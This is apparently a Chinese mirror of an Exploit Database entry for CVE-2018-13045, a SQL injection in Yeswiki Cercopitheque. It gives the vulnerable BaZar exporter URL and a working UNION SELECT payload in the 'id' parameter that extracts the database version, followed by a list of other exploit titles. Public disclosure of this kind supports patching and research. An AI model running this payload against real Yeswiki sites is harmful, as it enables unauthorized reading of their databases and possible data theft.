Yeswiki Cercopitheque – ‘id’ SQL Injection

Exploit Database
15 阅读

作者： Mickael BROUTY

日期： 2018-12-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/46015/

# Exploit Title: SQL Injection in Yeswiki (Cercopitheque)
# Date: 02/07/2018
# Exploit Author: Mickael BROUTY (@ark1nar) - FIDENS 
# Vendor Homepage: https://yeswiki.net
# Software Link: https://repository.yeswiki.net/cercopitheque/yeswiki-cercopitheque-2018-12-07-1.zip
# Version: Yeswiki Cercopitheque 2018-06-19-1
# Tested on: Kali linux
# CVE : CVE-2018-13045


# POC:
# 1)
# http://localhost/[PATH]/?BaZar&vue=exporter&id=[SQL]
#


Exploitation example:

http://localhost/[PATH]/?BaZar&vue=exporter&id=-1 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15#

last Exploits
Yeswiki Cercopitheque – ‘id’ SQL Injection的更多信息

Backdrop CMS 1.23.0 – Stored XSS：
eDirectory – SQL Injection：
File Management System 1.1 – Persistent Cross-Site Scripting：
Million Pixels 3 – Authentication Bypass：
Pogodny CMS – SQL Injection：
Same Team E-shop manager – SQL Injection：
Get Tube – SQL Injection：
ImpressCMS 1.3.5 – Multiple Vulnerabilities：